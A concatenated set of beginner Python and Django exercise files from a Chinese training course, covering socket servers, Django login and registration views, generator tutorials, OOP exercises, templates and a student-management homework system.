sk=socket.socket() sk.bind(('127.0.0.1',8000)) sk.listen() while True: print('启动服务端....') conn,addr=sk.accept() ret=conn.recv(1024) res=ret.decode('gbk') print(res) conn.send(b'HTTP/1.1 200 OK\r\n\r\n') conn.send('注册成功'.encode('gbk')) conn.close()<file_sep>/day19/homework/s21/app01/views.py from django.shortcuts import render, HttpResponse, redirect from app01 import loging from django.contrib import auth # 必须先导入auth from django.contrib.auth.decorators import login_required # auth装饰器 from django.contrib.auth.models import User # 创建用户auth自带 log=loging.mylog() # 登录 def login(request): if request.method == "GET": return render(request, "login.html") else: next_url = request.GET.get("next") print(next_url) username = request.POST.get("username") pwd = 
request.POST.get("password") user_obj = auth.authenticate(request, username=username, password=pwd) if user_obj: auth.login(request, user_obj) # # 给该次请求设置了session数据,并在响应中回写cookie if next_url: return redirect(next_url) else: log.info("%s登录成功" %(username)) return redirect("/index/") else: log.error("用户名或密码错误") return render(request, "login.html", {"error_msg": "用户名或密码错误"}) # 首页 @login_required() def index(request): # user = request.user user = auth.get_user(request) return render(request, "index.html", {"v": user}) # 注销页面 @login_required def logout(request): # 删除所有当前请求相关的session request.session.delete() log.info("此用户已退出") return redirect("/login/") # 创建用户 def register_user(request): if request.method == "GET": return render(request, "register_user.html") else: username = request.POST.get("username") pwd = request.POST.get("<PASSWORD>") user_obj = User.objects.create_user(username=username, password=pwd) # 用auth自带的去创建用户,这里用的是数据库自带的user表 log.info("注册了%s用户" %(username)) return redirect("/login/") # 更改密码 @login_required def change_password(request): user = auth.get_user(request) state = None if request.method == 'POST': old_password = request.POST.get('old_password', '') new_password = request.POST.get('new_password', '') repeat_password = request.POST.get('repeat_password', '') if user.check_password(old_password): if not new_password: state = 'empty' elif new_password != repeat_password: state = '两次密码不一致' log.error("两次密码不一致") return render(request, "change_password.html", {"error_new": state, "v": user}) else: user.set_password(<PASSWORD>) user.save() return redirect("/login/") else: state = '原始密码不对' log.error("原始密码不对") return render(request, "change_password.html", {"error_old": state, "v": user}) return render(request, 'change_password.html', {"v": user}) <file_sep>/day4/4.迭代器和生成器.py # 迭代器 # 如何从列表、字典中取值的 # index索引 ,key # for循环 # 凡是可以使用for循环取值的都是可迭代的 # 可迭代协议 :内部含有__iter__方法的都是可迭代的 # 迭代器协议 :内部含有__iter__方法和__next__方法的都是迭代器 # print(dir([1,2,3])) # lst_iter = 
[1,2,3].__iter__() # print(lst_iter.__next__()) # print(lst_iter.__next__()) # print(lst_iter.__next__()) # for i in [1,2,3]: # [1,2,3].__iter__() # print(i) # l = [1,2,3] # lst_iter = iter(l) # l.__iter__() # while True: # try: # print(next(lst_iter)) # lst_iter.__next__() # except StopIteration: # break # 什么是可迭代的 # 什么是迭代器 迭代器 = iter(可迭代的),自带一个__next__方法 # 可迭代 最大的优势 节省内存 # from collections import Iterable,Iterator # print(range(100000000)) # print(isinstance(range(100000000),Iterable)) # print(isinstance(range(100000000),Iterator)) # py2 range 不管range多少 会生成一个列表 这个列表将用来存储所有的值 # py3 range 不管range多少 都不会实际的生成任何一个值 # 迭代器的优势: # 节省内存 # 取一个值就能进行接下来的计算 ,而不需要等到所有的值都计算出来才开始接下来的运算 —— 快 # 迭代器的特性:惰性运算 # f = open() # for line in f: # 列表 字典 元组 字符串 集合 range 文件句柄 enumerate # 生成器 Generator # 自己写的迭代器 就是一个生成器 # 两种自己写生成器(迭代器)的机制:生成器函数 生成器表达式 # 生成器函数 # 200 0000 # 牛翔 200 0000 # 40期 # 赵英杰 200 0000 # 21 60 60件衣服 # 200 0000 - 60 # 500期 0 # 501 # def cloth(num): # ret = [] # for i in range(num): # ret.append('cloth%s'%i) # return ret # 凡是带有yield的函数就是一个生成器函数 # def func(): # print('****') # yield 1 # print('^^^^') # yield 2 # 记录当前所在的位置,等待下一次next来触发函数的状态 # # g = func() # print('--',next(g)) # print('--',next(g)) # 生成器函数的调用不会触发代码的执行,而是会返回一个生成器(迭代器) # 想要生成器函数执行,需要用next # def cloth_g(num): # for i in range(num): # yield 'cloth%s'%i # # # g = cloth_g(1000) # print(next(g)) # print(next(g)) # print(next(g)) # 使用生成器监听文件输入的例子 # import time # def listen_file(): # with open('userinfo') as f: # while True: # line = f.readline() # if line.strip(): # yield line.strip() # time.sleep(0.1) # # g = listen_file() # for line in g: # print(line) # send关键字 # def func(): # print(11111) # ret1 = yield 1 # print(22222,'ret1 :',ret1) # ret2 = yield 2 # print(33333,'ret2 :',ret2) # yield 3 # # # g = func() # ret = next(g) # print(ret) # print(g.send('alex')) # 在执行next的过程中 传递一个参数 给生成器函数的内部 # print(g.send('金老板')) # 想生成器中传递值 有一个激活的过程 第一次必须要用next触发这个生成器 # 例子 # 计算移动平均值 # 12 13 15 18 # 月度 的 天平均收入 # def average(): # sum_money 
= 0 # day = 0 # avg = 0 # while True: # money = yield avg # sum_money += money # day += 1 # avg = sum_money/day # # g = average() # next(g) # print(g.send(200)) # print(g.send(300)) # print(g.send(600)) # 预激生成器 # def init(func): # def inner(*args,**kwargs): # ret = func(*args,**kwargs) # next(ret) # 预激活 # return ret # return inner # # @init # def average(): # sum_money = 0 # day = 0 # avg = 0 # while True: # money = yield avg # sum_money += money # day += 1 # avg = sum_money/day # # g = average() # print(g.send(200)) # print(g.send(300)) # print(g.send(600)) # # yield from def generator_func(): yield from range(5) yield from 'hello' # for i in range(5): # yield i # for j in 'hello': # yield j # g = generator_func() # for i in generator_func(): # print(i) g1 = generator_func() g2 = generator_func() next(generator_func()) next(generator_func()) # 如何从生成器中取值 # 第一种 :next 随时都可以停止 最后一次会报错 # print(next(g)) # print(next(g)) # 第二种 :for循环 从头到尾遍历一次 不遇到break、return不会停止 # for i in g: # print(i) # 第三种 :list tuple 数据类型的强转 会把所有的数据都加载到内存里 非常的浪费内存 # print(g) # print(list(g)) # 生成器函数 是我们python程序员实现迭代器的一种手段 # 主要特征是 在函数中 含有yield # 调用一个生成器函数 不会执行这个函数中的带码 只是会获得一个生成器(迭代器) # 只有从生成器中取值的时候,才会执行函数内部的带码,且每获取一个数据才执行得到这个数据的带码 # 获取数据的方式包括 next send 循环 数据类型的强制转化 # yield返回值的简便方法,如果本身就是循环一个可迭代的,且要把可迭代数据中的每一个元素都返回 可以用yield from # 使用send的时候,在生成器创造出来之后需要进行预激,这一步可以使用装饰器完成 # 生成器的特点 : 节省内存 惰性运算 # 生成器用来解决 内存问题 和程序功能之间的解耦 # 列表推倒式 # new_lst = [] # for i in range(10): # new_lst.append(i**2) # print(new_lst) # print([i**2 for i in range(10)]) # l = [1,2,3,-5,6,20,-7] # print([i%2 for i in range(10)]) # l = [1,2,3,-5,6,20,-7] # print([num for num in l if num%2 == 1]) # 30以内所有能被3整除的数 # print([i for i in range(30) if i%3 ==0]) # # 30以内所有能被3整除的数的平方 # print([i**2 for i in range(30) if i%3 ==0]) # 找到嵌套列表中名字含有两个‘e’的所有名字 # names = [['Tom', 'Billy', 'Jefferson', 'Andrew', 'Wesley', 'Steven', 'Joe'], # ['Alice', 'Jill', 'Ana', 'Wendy', 'Jennifer', 'Sherry', 'Eva']] # print([name for name_lst in names for name in name_lst 
if name.count('e') == 2]) # 生成器表达式 # l = [i for i in range(30) if i%3 ==0] # 列表推倒式 排序的时候 # g = (i for i in range(30) if i%3 ==0) # 生成器表达式 庞大数据量的时候 使用生成器表达式 # print(l) # print(g) # for i in g:print(i) # 林海峰 # 面试题 # def demo(): # for i in range(4): # yield i # # g=demo() # # g1=(i for i in g) # g2=(i for i in g1) # # print(list(g1)) # print(list(g2)) # def add(n,i): # return n+i # # def test(): # for i in range(4): # yield i # # g=test() # for n in [1,3,10]: # g=(add(n,i) for i in g) # # print(list(g)) # 一个生成器 只能取一次 # 生成器在不找它要值的时候始终不执行 # 当他执行的时候,要以执行时候的所有变量值为准 <file_sep>/day15/作业/core/login.py from conf import setting import pymysql # 登录函数 def login(): conn = pymysql.connect(host=(setting.host), user=(setting.user), password=(setting.password), database=(setting.database), charset=(setting.charset)) cursor = conn.cursor() count = 0 while count < 3: count += 1 user = input('用户名:').strip() pwd = input('密码:').strip() sql = "select * from t1 where user=%s and pwd=%s" res = cursor.execute(sql, [user, pwd]) # 执行sql语句,返回sql查询成功的记录数目 if res: print('登录成功') quit() else: print('登录失败') continue cursor.close() conn.close() <file_sep>/day7/封装.py # class Person(): # __country='中国' # print(__country) # print(Person.__dict__) # print(Person._Person__country) # 不能使用这种方式去调用私有的变量 # #私有的名字,只能在类的内部使用,不能在类的外部使用 # Person.__name='XXX' #在类的外部不能定义私有变量 # print(Person.__name) # print(Person.__dict__) #私有变量: # 在类的内部 如果使用__变量的形式会发生变形,python会自动的为你加上_类名 # class Person(): # __country='中国' #私有的静态属性 # def __init__(self,name,pwd): # self.name=name # self.__pwd=pwd #私有的对象属性 # def login(self): # print(self.__dict__) # if self.name=='alex' and self.__pwd=='<PASSWORD>': # print('登录成功') # alex=Person('alex','alex3714') # alex.login() # print(alex.__dict__) # class Persion(): # def __init__(self):pass # def __制造密码转换(self): #私有方法 # print('转换成功') # def 注册(self): # inp = input('pwd>>>') # 加密之后的密码=self.__制造密码转换(inp) # alex=Persion() # alex.注册() # 静态属性 、 对象属性、 方法(动态属性) 前面加上双下划綫都会变成私有的 # 私有的特点就是只能在类的内部调用,不能在类的外部使用 
#面试题: class Foo: def __init__(self): self.func() def func(self): print('in FOO') class Son(Foo): # def __init__(self): # self.func() def func(self): print('in son') s=Son() #2 class Foo: def __init__(self): self.__func() def __func(self): print('in foo') class Son(Foo): def __func(self): print('in son') s=Son()<file_sep>/day2/作业终版.py goods = [{"name": "电脑", "price": 1999}, {"name": "鼠标", "price": 10}, {"name": "游艇", "price": 20}, {"name": "美女", "price": 998},] shopping_car = [] salry = int(input("请输入你的金额:").strip()) while True: print("商品列表!") for i in range(len(goods)): ##给商品列表加上id,去循环goods的长度 print(i, goods[i]["name"], goods[i]["price"]) buy = input("请输入你要购买的商品ID 退出:Q:").strip() if not buy:continue ##如果是空,请继续输入 if buy.isdigit(): buy = int(buy) buy_num = input("请输入你购买的数量:").strip() if not buy_num: continue ##如果是空,请继续输入 if buy_num.isdigit(): buy_num = int(buy_num) if (goods[buy]["price"] * buy_num) < salry: ##判断商品价格是否小于你输入的金额 print("购买成功") count = 1 while count <= buy_num: ##买几个循环几次, shopping_car.append({"name": goods[buy]["name"], "price": goods[buy]["price"]}) ##把购买的商品加入到你的shoping_car列表里 count += 1 salry = salry - (goods[buy]["price"] * buy_num) ##计算余额 print("余额:%s" % (salry)) choice_goon = input("是否继续购买,如果想请按y,否则按q:") if choice_goon == "y" or choice_goon == "Y": continue else: ##退出的时候打印你已经购买的商品列表 price = 0 for i in range(len(shopping_car)): # print(i) print("订单%s: %s %s¥" % (i, shopping_car[i]["name"], shopping_car[i]["price"])) price = price + shopping_car[i]["price"] ##计算一共消费多少钱 print("一共消费:%s" % (price,)) break else: print("金额不够!") if buy == "q" or buy =="Q": print("你没购买商品") break # # # <file_sep>/day27/s21crm/crm/templates/school_list.html {% extends 'layout.html' %} {% load rbac %} {% block content %} <div class="panel panel-default"> <div class="panel-heading"> <h3 class="panel-title">学校列表</h3> </div> <div class="panel-body"> <table class="table table-bordered"> <thead> <tr> <th>学校名字</th> {% if "school_edit"|permission:request or 
"school_del"|permission:request %} <th>操作</th> {% endif %} </tr> </thead> <tbody> {% for row in queryset %} <tr> <td>{{ row.title }}</td> {% if "school_edit"|permission:request or "school_del"|permission:request %} <td> {% if "school_edit"|permission:request %} <a href="{% url 'school_edit' row.id %}">编辑</a> {% endif %} {# <a href="{% url 'school_del' row.id %}/">删除</a>#} {% if "school_del"|permission:request %} <a href="{% url 'school_del' row.id %}">删除</a> {% endif %} </td> {% endif %} </tr> {% endfor %} </tbody> </table> <div> {% if 'school_add'|permission:request %} <a class="btn btn-primary" href="{% url 'school_add' %}">添加</a> {% endif %} </div> </div> {% endblock %}<file_sep>/day11/9 overflow的用法.html <!--(8)overflow:--> <!----> <!--visible 默认值。内容不会被修剪,会呈现在元素框之外。--> <!--hidden 内容会被修剪,并且其余内容是不可见的。--> <!--scroll 内容会被修剪,但是浏览器会显示滚动条以便查看其余的内容。--> <!--auto 如果内容被修剪,则浏览器会显示滚动条以便查看其余的内容。--> <!--inherit 规定应该从父元素继承 overflow 属性的值。--> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>overflow用法</title> <style> body{ overflow: auto; } div{ width: 500px; height: 100px; border: 1px solid red; overflow: inherit; /*overflow: scroll;*/ } </style> </head> <body> <div> 唐朝(618年—907年),是继隋朝之后的大一统王朝,共历二十一帝,享国二百八十九年,因皇室姓李,故又称为李唐,是公认的中国最强盛的时代之一。 隋末天下群雄并起,617年,唐国公李渊晋阳起兵,次年于长安称帝建立唐朝。唐太宗继位后开创“贞观之治”。唐高宗承贞观遗风开创“永徽之治”。690年,武则天以周代唐,定都洛阳,史称武周。神龙革命后恢复唐朝国号。 [1-11] 唐玄宗即位后励精图治,开创了万邦来朝的开元盛世。 [12] 天宝末全国人口达八千万上下。 [13-16] 安史之乱后藩镇割据、宦官专权导致国力渐衰,中后期经唐宪宗元和中兴、唐武宗会昌中兴、唐宣宗大中之治国势复振。878年,爆发黄巢起义破坏了唐朝统治根基,907年,朱温篡唐,唐朝覆亡,中国进入五代十国。 [17] </div> </body> </html><file_sep>/day6/作业/作业.py import json import sys import time class School: def __init__(self,name): self.name=name def creat_class(self): print('欢迎创建班级'.center(50,'#'),'\n') class_name=input("请输入班级名称") class_obj=Classroom(class_name) print("创建班级成功,信息如下:".center(50, '-'), '\n') class_dict = { "班级名称": class_name, } class_obj.show_class() f=open('class_info','a') f.write(json.dumps(class_dict,ensure_ascii=False)) control_view() def 
shcool_info(self): print('学校名称%s,学校所在地%s'%(self.name,self.name)) class Classroom: def __init__(self,class_name): self.name=class_name def show_class(self): print("班级名称是%s"%self.name) ##存贮用户登录状态的 user_status = { 'username': None, 'status': False } ##登录函数 def wrapper(f2): def inner(): func1 = str(inner) func2 = str(quit) if func2 in func1: exit() if user_status.get('status'): f2() ##就是被装饰的函数 else: print('\033[1;33m注意,请先登录,在操作,超过三次锁定用户\033[0m') b = 0 while b < 3: username = input("\033[1;33m请输入你的用户名:\033[0m") password = input("\033[1;33m请输入你的密码:\033[0m") with open('..\作业\db\info',encoding='utf-8')as f1: for i in f1: a = (i.split()) if a[0] == username and a[1] == password: print(a[0],a[1]) user_status['status'] = True print("\033[1;33m登录成功\033[0m") return username else: print("登录失败,请重新登录,你已经用了%s次" % (b+1)) b += 1 return inner @wrapper def login(): ##这里重新定义一个login函数,因为你如果直接执行装饰器会报错,因为里面传了一个参数 pass @wrapper def control_view():#管理视图 choice_id = input("\n*************************请选择功能********************\n" "1.创建班级" "2.创建课程" "3.创建讲师" "4.返回" "5.退出\n: ") if choice_id == '1': schoolid.creat_class() # elif choice_id == '2': # schoolid.creat_course() # elif choice_id == '3': # #print("你好") # schoolid.create_teacher() # #print("你好") # elif choice_id == '4': # select_fun() # elif choice_id == '5': # sys.exit() @wrapper def select_school(): global schoolid choice_school_id = input("\n*************************请选择学校********************\n" "a.北京校区" "b.上海校区" "q.退出\n: ") if choice_school_id == 'a': schoolid = school1 elif choice_school_id == 'b': schoolid = school2 elif choice_school_id == 'q': sys.exit() else: print("\033[4;35m请输入真确的选项:\033[0m") @wrapper def select_fun(): # 选择功能 choice_id = input("\n*************************请选择功能********************\n" "1.学员视图" "2.讲师视图" "3.管理视图" "4.返回\n: ") # choice_id = int(choice_id) #input 输入时字符串格式下面的 choice 是int 类型 需要进行类型转换 if choice_id == '1': print("待完善") elif choice_id == '2': print("待完善") elif choice_id == '3': control_view() # 
print("你好11111") elif choice_id == '4': select_school() else: return time.sleep(2) def main(): while True: select_school() #选择功能# select_fun() #选择学校 if __name__ == '__main__': classrooms = {} # teachers = {} # students = {} school1 = School('昌平校区') school2 = School('浦东校区') main() # dic = {1:login, # # # } # def chiose(): # global school1 # global school2 # while True: # school1=School('昌平') # school2=School('浦东') # global login # with open('..\作业\db\shcool-mange',encoding='utf-8') as f1: # print(f1.read()) # num= int(input("请选择一个序号操作:").strip()) # if num == 1: # dic.get(num)() # #login() # elif num ==3: # schoolid.creat_class() # # # # chiose() <file_sep>/day6/多继承.py # python两种类 # 经典类 py3已经灭绝了 在python2里还存在,在py2中只要程序员不主动继承object,这个类就是经典类 —— 深度优先 # 新式类 python3所有的类都是新式类,所有的新式类都继承自object —— 在多继承中遵循广度优先算法 # 钻石继承问题 class A: def f(self): print('in A') class B(A): def f(self): print('in B') super().f() class C(A): pass def f(self): print('in C') super().f() class D(B,C): def f(self): print('in D') super().f() d = D() d.f() print(D.mro()) #可以查看继承的顺序 #super和找父类这件事是两回事 # 在单继承中 super就是找父类 # 在多级承中 super的轨迹 是根据整个模型的起始点而展开的一个广度优先顺序 遵循mro规则 ''' class A: def f(self): print('in A') class B(A): pass # def f(self): # print('in B') class C(A): pass # def f(self): # print('in C') class D(B,C): pass # def f(self): # print('in D') class E(C): pass # def f(self): # print('in B') class F(D,E): pass # def f(self): # print('in C') # d = D() # d.f() print(F.mro()) ''' class A: def f(self): print('in A') class B(A): def f(self): print('in B') class C(A): pass def f(self): print('in C') class D(B,C): def f(self): print('in D') d = D() d.f() print(D.mro())<file_sep>/day19/CMS/fault_reporting/views.py from django.shortcuts import render, redirect, HttpResponse from django import views from django.contrib import auth import random from utils.geetest import GeetestLib # 导入滑动验证码的模块 #请在官网申请ID使用,示例ID不可使用 pc_geetest_id = "b46d1900d0a894591916ea94ea91bd2c" pc_geetest_key = 
"36fc3fe98530eea08dfc6ce76e3d24c4" def pcgetcaptcha(request): user_id = 'test' gt = GeetestLib(pc_geetest_id, pc_geetest_key) status = gt.pre_process(user_id) request.session[gt.GT_STATUS_SESSION_KEY] = status request.session["user_id"] = user_id response_str = gt.get_response_str() return HttpResponse(response_str) # Create your views here. class LoginView(views.View): def get(self, request): return render(request, "login.html") def post(self, request): next_url = request.GET.get("next","/index/") username = request.POST.get("username") pwd = request.POST.get("<PASSWORD>") # v_code=request.POST.get("vcode","").upper() #如果用户不写验证码就是空 # 滑动验证码开始 gt = GeetestLib(pc_geetest_id, pc_geetest_key) challenge = request.POST.get(gt.FN_CHALLENGE, '') validate = request.POST.get(gt.FN_VALIDATE, '') seccode = request.POST.get(gt.FN_SECCODE, '') status = request.session[gt.GT_STATUS_SESSION_KEY] user_id = request.session["user_id"] if status: result = gt.success_validate(challenge, validate, seccode, user_id) else: result = gt.failback_validate(challenge, validate, seccode) #滑动验证码结束 # if v_code==request.session.get("v_code"): if result: user_obj = auth.authenticate(username=username, password=pwd) if user_obj: auth.login(request, user_obj) # auth认证登录 return redirect(next_url) else: return render(request, "login.html", {"error_msg": "用户名或密码错误"}) else: return render(request, "login.html", {"error_msg": "验证码错误"}) # 首页 def index(request): return render(request, "index.html") # 验证码路径 # def vcode(request): # from PIL import Image, ImageDraw, ImageFont # 导入绘图模块 # # 定义一个生成随机颜色代码的函数 # def random_color(): # return random.randint(0, 255), random.randint(0, 255), random.randint(0, 255) # # # 创建一个随机背景颜色的图片对象 # image_obj = Image.new( # "RGB", # (250, 35), # 背景图片的长和宽 # random_color() # ) # # 在该图片对象上生成一个画笔对象 # draw_obj = ImageDraw.Draw(image_obj) # # 加载一个字体对象 # font_obj = ImageFont.truetype('static/font/kumo.ttf', 28) # 字体大小 # tmp = [] # for i in range(5): # l = chr(random.randint(97, 122)) # 
生成随机的小写字母 # u = chr(random.randint(65, 90)) # 生成随机的大写字母 # n = str(random.randint(0, 9)) # 生成一个随机的数字 # # 从上面三个随机选一个 # r = random.choice([l, u, n]) # # 将选中过的那个字符写到图片上 # draw_obj.text((40 * i + 30, 0), r, fill=random_color(), font=font_obj) # text指定的是从那开始写位置,fill是字体颜色 # tmp.append(r) # # v_code = "".join(tmp).upper() # # 将生成的验证码保存 # request.session["v_code"] = v_code # # # 直接在内存中保存图片替代io操作 # from io import BytesIO # f1 = BytesIO() # image_obj.save(f1, format="PNG") # 将背景图片保存到f1里面 # img_data = f1.getvalue() # 去f1取图片 # return HttpResponse(img_data, content_type="image/png") <file_sep>/student_guanli_system/conf/settings.py #定义目录路径 userinfo = '../db/userinfo' school_info = '../db/school_info' course_info = '../db/course_info' class_info = '../db/class_info' teacher_info = '../db/teacher_info' student_info = '../db/student_info' classes_dir = '../db/classes' # with open('../db/userinfo','r') as f1: # print(f1.read()) # # for i in f1: # # print(i.strip())<file_sep>/day9/线程/线程池.py #线程池 # import time # from concurrent.futures import ThreadPoolExecutor,ProcessPoolExecutor # def func(num): # print(num) # time.sleep(1) # print(num) # if __name__ == '__main__': # t=ThreadPoolExecutor(20) # for i in range(50): # t.submit(func,i) # t.shutdown() # print('done') #map的简便用法 # import os,time,random # from concurrent.futures import ThreadPoolExecutor # def task(n): # print('%s is runing' %os.getpid(),n) # time.sleep(random.randint(1,3)) # return n**2 # if __name__ == '__main__': # executor=ThreadPoolExecutor(max_workers=3) # # for i in range(11): # # future=executor.submit(task,i) # executor.map(task,range(1,12)) #map取代了for+submit #把1到12都赋值给n #callback(回调函数) # import time # import random # from concurrent.futures import ThreadPoolExecutor # from threading import current_thread # urls=[ # 'https://www.baidu.com', # 'https://www.python.org', # 'https://www.openstack.org', # 'https://help.github.com/', # 'http://www.sina.com.cn/' # 'http://www.cnblogs.com/' # 'http://www.sogou.com/' # 
'http://www.sohu.com/' # ] # # def analies(content): # print('分析网页',current_thread()) # print(content.result()) # # # def get_url(url): # print('爬取网页',current_thread()) # time.sleep(random.uniform(1,3)) # # analies(url*10) # return url*10 # # t = ThreadPoolExecutor(3) # print('主线程',current_thread()) # for url in urls: # t.submit(get_url,url).add_done_callback(analies) # #回调函数当执行了get_url之后,得到了一个url*10 ,然后在立即执行analies函数,并传给content参数 # concurrent.futures里面的 callback是由子线程做的 #进程池 # import time # from concurrent.futures import ProcessPoolExecutor # def func(num): # print(num) # time.sleep(1) # print(num) # if __name__ == '__main__': # t=ProcessPoolExecutor(20) # for i in range(50): # t.submit(func,i) # t.shutdown() # print('done')<file_sep>/day6/练习组合.py # 昵称,name # sex,sex # 战斗力,dps # 血液,hp ''' class Person: def __init__(self,name,sex,hp,dps): self.name=name self.sex=sex self.hp=hp self.dps=dps def attack(self,dog): #人打狗 dog.hp-=self.dps print('%s打了%s,%s掉了%s点血,还剩%s点血' %(self.name,dog.name,dog.name,self.dps,dog.hp)) class Dog: def __init__(self, name, kind, hp, dps): self.name = name self.kind=kind self.hp = hp self.dps = dps def bitt(self,person): #狗咬人 person.hp -= self.dps print('%s咬了%s,%s掉了%s点血,还剩%s点血' % (self.name, person.name, person.name, self.dps, person.hp)) class Weapon: def __init__(self,name,price,dps): self.name=name self.price=price self.dps=dps def kill(self,dog): dog.hp -= self.dps alex =Person('alex','男',250,5) ha2 = Dog('小黑','藏獒',10000,200) roubaozi = Weapon('肉包子',500000,1000) #实例化武器 alex.money=1000000 if alex.money >= roubaozi.price: alex.weapon = roubaozi #一个类的对象给另外一个类的对象当属性,就是roubaozi给alex这个对象当属性 alex.weapon.kill(ha2) #这是组合的常见方式 对象点属性是一个新的对象就是roubaozi print('小黑还剩%s点血'%(ha2.hp)) alex.attack(ha2) ha2.bitt(alex) ''' ##计算园环面积和周长,圆环面积=大圆面积-小圆面积 圆环周长=大环周长+小环周长 from math import pi class Yuan: def __init__(self,r): #4 self.r=r def mj(self): return pi*self.r**2 def zc(self): return 2*pi*self.r class huan: def __init__(self,outside_r,inside_r): #2 
self.outside=Yuan(outside_r) #大圆半径 #3 self.inside=Yuan(inside_r) #小圆半径 #4 def huan_mj(self): return self.outside.mj()-self.inside.mj() #5 def huan_zc(self): return self.outside.zc()-self.inside.zc() r=huan(10,5) #1 print(r.huan_mj()) print(r.huan_zc()) # yuan=Yuan(4) # mj=yuan.mj() # zc=yuan.zc() # print(mj,zc) <file_sep>/day27/s21crm/crm/views/public.py from django.shortcuts import render, redirect from crm import models from crm.forms.public import PublicCustomModelForm from django.urls import reverse def public_customer_list(request): """ 公户列表 :param request: :return: """ if request.method == "POST": # 当用户点击申请到私户的时候执行下面代码 id_list = request.POST.getlist('pk') # 获取客户id current_user_id = request.session['user_info']['id'] # 获取当前登录用户id # 找到公户,并且把公户的课程顾问设置成当前登录用户 models.Customer.objects.filter(id__in=id_list).update(consultant_id=current_user_id) # 如果是get就查找公户,就是没有课程顾问的用户 queryset = models.Customer.objects.filter(consultant__isnull=True) # 课程顾问等于空 return render(request, 'public_custom_list.html', {'queryset': queryset}) def public_customer_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = PublicCustomModelForm() return render(request, 'public_custom_add.html', {'form': form}) form = PublicCustomModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('public_customer_list') else: return render(request, 'public_custom_add.html', {'form': form}) def public_customer_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.Customer.objects.filter(id=nid).first() if request.method == "GET": form = PublicCustomModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'public_custom_edit.html', {"form": form}) form = PublicCustomModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('public_customer_list') else: return render(request, 'public_custom_edit.html', {"form": form}) def public_customer_del(request, nid): """ 
from django import template
from luffy_permission import settings

register = template.Library()


@register.inclusion_tag(filename="my_menu.html")
def show_menu(request):
    """
    Inclusion tag: read the menu structure that was stored in the session
    (under settings.MENU_SESSION_KEY, presumably at login — confirm against
    the login view) and hand it to my_menu.html for rendering.
    """
    menu_list = request.session[settings.MENU_SESSION_KEY]
    return {"menu_list": menu_list}  # context dict passed to my_menu.html
# Exercise 1: turn the string "k:1|k1:2|k2:3|k3:4" into a dict.
# NOTE: do not name the variable `str` — that shadows the builtin str type.
raw = "k:1|k1:2|k2:3|k3:4"
pairs = raw.split("|")
print(pairs)
dic = {}
for pair in pairs:
    key, value = pair.split(":")   # "k:1" -> ("k", "1")
    print([key, value])
    # Values are kept as strings, matching the original output;
    # use int(value) if numeric values are required.
    dic[key] = value
print(dic)

# Exercise 2: partition li around 66 — values > 66 go under "k1",
# the rest under "k2".
li = [11, 22, 33, 44, 55, 66, 77, 88, 99, 90]
dic = {"k1": [], "k2": []}
for n in li:
    dic["k1" if n > 66 else "k2"].append(n)
print(dic)
#创建用户库 class User(models.Model): id = models.AutoField(primary_key=True) username=models.CharField(max_length=32,unique=True) password=models.CharField(max_length=32) services=models.ManyToManyField(to="Service",related_name="user") # 创建业务表 class Service(models.Model): id = models.AutoField(primary_key=True) name=models.CharField(max_length=32,unique=True) # 创建主机表 class Host(models.Model): id = models.AutoField(primary_key=True) hostname = models.CharField(max_length=32) pwd=models.CharField(max_length=32) service=models.ForeignKey(to="Service",on_delete=models.CASCADE) <file_sep>/student_guanli_system/core/manager.py import pickle import os import hashlib from conf import settings from core.teacher import Teacher from core.student import Student from core import mypickle class Foo: def __repr__(self): show_str='' for key in self.__dict__: show_str+='%s:%s'%(key,self.__dict__[key]) return show_str class School(Foo): def __init__(self,name,addr): self.name=name self.addr=addr class Classes(Foo): #班级类 def __init__(self,name,course): self.name=name self.course=course class Manager: Operate_lst = [('创建学校', 'create_school'), ('创建课程', 'create_courses'), ('创建班级', 'create_classes'), ('创建学员账号', 'create_student'), ('创建讲师账号', 'create_teacher'), ('查看学校', 'show_school'), ('查看讲师', 'show_teacher'), ('查看班级', 'show_class'), ('查看课程', 'show_course'), ('查看学生', 'show_student'), ('给课程关联讲师', 'combine_teacher_course'), ('给学员指定班级', 'add_student'), ('退出', 'quit') ] def __init__(self,name): self.name=name self.school_pickle=mypickle.MyPickle(settings.school_info) self.teacher_pickle = mypickle.MyPickle(settings.teacher_info) self.class_pickle = mypickle.MyPickle(settings.class_info) self.student_pickle = mypickle.MyPickle(settings.student_info) def create_school(self): sch_name=input('请输入学校名字:') sch_addr=input('请输入学校地址: ') sch_obj=School(sch_name+',',sch_addr) self.school_pickle.dump(sch_obj) print('创建学校成功') def show_school(self): for num,school_obj in enumerate(self.school_pickle.load(),1): 
print( '\033[1;32m查看学校:%s,%s\033[0m'% (num,school_obj)) def create_classes(self): class_name=input("请输入班级名称:") course=input('请输入课程:') clas_obj = Classes(class_name+',',course) #实例化班级 self.class_pickle.dump(clas_obj)#存储班级对象的信息到 classinfo 文件里 def show_class(self): for num,class_obj in enumerate(self.class_pickle.load(),1): print('\033[1;32m查看班级:%s,%s\033[0m' % (num, class_obj)) def __register(self,identity):#创建用户的方法 username=input('请输入要创建的%s角色的姓名' %identity) passwd=input('请输入密码') md5_obj=hashlib.md5(username.encode('utf-8')) md5_obj.update(passwd.encode('utf-8')) md5_passwd=md5_obj.hexdigest() new_user_info='%s,|%s,|%s\n' % (username,md5_passwd,identity) with open(settings.userinfo,mode='a',encoding='utf-8') as f: f.write(new_user_info) return username def create_courses(self): pass def create_teacher(self): username=self.__register('Teacher') #给老师选一个校区 self.show_school() school_num=int(input('请输入老师所在的学校序号:')) school_obj=self.school_pickle.get_item(school_num) #根据序号活动了一个学校名字 teacher_obj=Teacher(username+',') teacher_obj.school=school_obj # 将老师选择的校区和老师对象绑定在一起 self.teacher_pickle.dump(teacher_obj) # 将老师对象整体dump进入teacherinfo文件 print('创建老师成功') def show_teacher(self): for num, teacher_obj in enumerate(self.teacher_pickle.load(), 1): print('\033[1;32m查看信息为:%s,%s\033[0m' % (num, teacher_obj)) def create_student(self): username=self.__register('Student') self.show_class() #查看有哪些班级 cls_num=int(input('请选择要绑定的班级')) #把班级对象绑定给学生 cls_obj=self.class_pickle.get_item(cls_num) #根据cla_num去判断班级是否存在 # 创建一个学员对象,把学员的信息写在studentinfo stu_obj=Student(username+',') 